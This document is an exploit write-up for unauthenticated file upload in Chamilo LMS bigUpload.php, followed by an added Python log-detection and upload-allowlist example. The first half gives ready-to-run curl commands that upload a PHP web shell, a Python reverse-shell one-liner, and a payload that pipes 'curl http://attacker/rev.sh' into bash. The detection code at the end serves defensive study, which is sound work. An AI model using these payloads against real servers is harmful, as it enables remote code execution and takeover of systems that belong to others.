intro

Unrestricted file upload in the big file upload functionality in /main/inc/lib/javascript/bigupload/inc/bigUpload.php in Chamilo LMS <= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution by uploading a web shell.

how to exploit

  • create a local file containing the payload
> echo '<?php system("id"); ?>' > test.php
  • upload the file
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
  • trigger the code
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'

combined with reverse shell

  • create a rev.sh file
# rev.sh
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
  • create a file to upload
> echo '<?php system("curl http://attacker/rev.sh|bash"); ?>' > test.php
  • upload
> curl -F 'bigUploadFile=@test.php' 'http://target/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
  • trigger
> curl 'http://target/main/inc/lib/javascript/bigupload/files/test.php'
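As an added example (not part of the original write-up), a Python detection routine that runs over constructed Apache-style access-log lines and flags the two request patterns the write-up relies on: a POST to bigUpload.php with action=post-unsupported, and a later GET of a script from the bigupload files directory. The extension list, the allowlist in is_allowed_upload and the log lines are assumptions, and the check goes beyond .php to related PHP extensions.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample log lines (Apache-style); IPs are documentation ranges, not real hosts.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jan/2024:10:00:01 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 41
203.0.113.5 - - [10/Jan/2024:10:00:03 +0000] "GET /main/inc/lib/javascript/bigupload/files/test.php HTTP/1.1" 200 57
198.51.100.7 - - [10/Jan/2024:10:05:00 +0000] "GET /main/inc/lib/javascript/bigupload/files/lecture.mp4 HTTP/1.1" 200 9999
198.51.100.7 - - [10/Jan/2024:10:06:00 +0000] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post HTTP/1.1" 200 41
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')
UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigUpload.php"
FILES_DIR = "/main/inc/lib/javascript/bigupload/files/"
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5", ".php7")  # assumption: extensions the web server may execute
ALLOWED_EXT = {".mp4", ".pdf", ".zip", ".png", ".jpg"}      # assumption: a site-specific upload allowlist

def parse_line(line):
    """Split one access-log line into ip, method, path, action query parameter and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    u = urlparse(d["target"])
    d["path"] = u.path
    d["action"] = parse_qs(u.query).get("action", [""])[0]
    return d

def find_suspicious(log_text):
    """Return (ip, reason, path) tuples for requests matching the bigUpload abuse pattern, in log order."""
    hits = []
    for line in log_text.splitlines():
        r = parse_line(line)
        if not r:
            continue
        if r["method"] == "POST" and r["path"] == UPLOAD_ENDPOINT and r["action"] == "post-unsupported":
            hits.append((r["ip"], "unauthenticated big-upload endpoint hit", r["path"]))
        elif r["method"] == "GET" and r["path"].startswith(FILES_DIR) and r["path"].lower().endswith(SCRIPT_EXT):
            hits.append((r["ip"], "script fetched from upload directory", r["path"]))
    return hits

def is_allowed_upload(filename):
    """Allowlist check a hardened upload handler would apply before writing to disk.
    Rejects any dotted segment that is a script extension, so test.php.jpg is refused too."""
    parts = filename.rsplit("/", 1)[-1].lower().split(".")
    if len(parts) < 2 or any("." + p in SCRIPT_EXT for p in parts[1:]):
        return False
    return "." + parts[-1] in ALLOWED_EXT

if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG):
        print(*hit)
```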